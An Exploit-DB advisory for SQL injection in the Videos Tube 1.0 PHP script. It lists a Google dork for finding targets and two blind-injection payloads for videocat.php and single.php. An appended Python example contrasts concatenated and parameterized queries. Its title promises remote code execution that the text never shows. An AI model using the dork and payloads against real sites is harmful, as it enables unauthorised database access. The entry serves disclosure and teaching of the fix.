exploit-db-mirror/platforms/php/webapps/33514.txt
Offensive Security 65f378afeb Updated 05_31_2014
2014-05-31 04:36:31 +00:00

# Exploit Title: Videos Tube SQL Injection and Remote Code Execution
# Google Dork: inurl:"single.php?url=" video
# Date: 05.05.2014
# Exploit Author: Mustafa ALTINKAYNAK
# Vendor Homepage: http://www.phpscriptlerim.com
# Software Link: http://demo.phpscriptlerim.com/free/videostube/
# Version: 1.0
Description
========================
The category page and the video page are each affected by two types of SQL injection: boolean-based blind and AND/OR time-based blind. The issue can be closed by filtering the incoming data.
Vulnerability
========================
1) videocat.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with the sqlmap tool)
2) single.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with the sqlmap tool)
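
Added example, not part of the original advisory or the vendor's code: a Python/sqlite3 model of why the `url` value listed above changes the query result when it is concatenated into SQL, and why it is inert when bound as a parameter. The `videos` table, its columns and the function names are assumptions; the page does not show the application's schema or source.

```python
import sqlite3

# Constructed stand-in for the application's database. The table and column
# names are hypothetical; the advisory does not show the real schema.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE videos (url TEXT PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO videos VALUES ('test', 'Sample video')")
    return db

def lookup_concatenated(db, url):
    # Vulnerable pattern: the request value becomes part of the SQL text,
    # so a quote in it ends the string literal and the rest is parsed as SQL.
    sql = "SELECT title FROM videos WHERE url = '" + url + "'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, url):
    # Hardened pattern: the value is bound as data and never parsed as SQL.
    return db.execute(
        "SELECT title FROM videos WHERE url = ?", (url,)
    ).fetchall()

# The value from the advisory, and the same value with a false comparison.
TRUE_CASE = "test' AND 3383=3383 AND 'ODau'='ODau"
FALSE_CASE = "test' AND 3383=3384 AND 'ODau'='ODau"

def compare():
    # Row counts for (true condition, false condition) under each pattern.
    db = make_db()
    return {
        "concatenated": (len(lookup_concatenated(db, TRUE_CASE)),
                         len(lookup_concatenated(db, FALSE_CASE))),
        "parameterized": (len(lookup_parameterized(db, TRUE_CASE)),
                          len(lookup_parameterized(db, FALSE_CASE))),
    }

if __name__ == "__main__":
    print(compare())
```

With concatenation the page renders differently depending on whether the injected condition is true, which is the signal a boolean-based blind test relies on; with a bound parameter both values are simply unknown URLs.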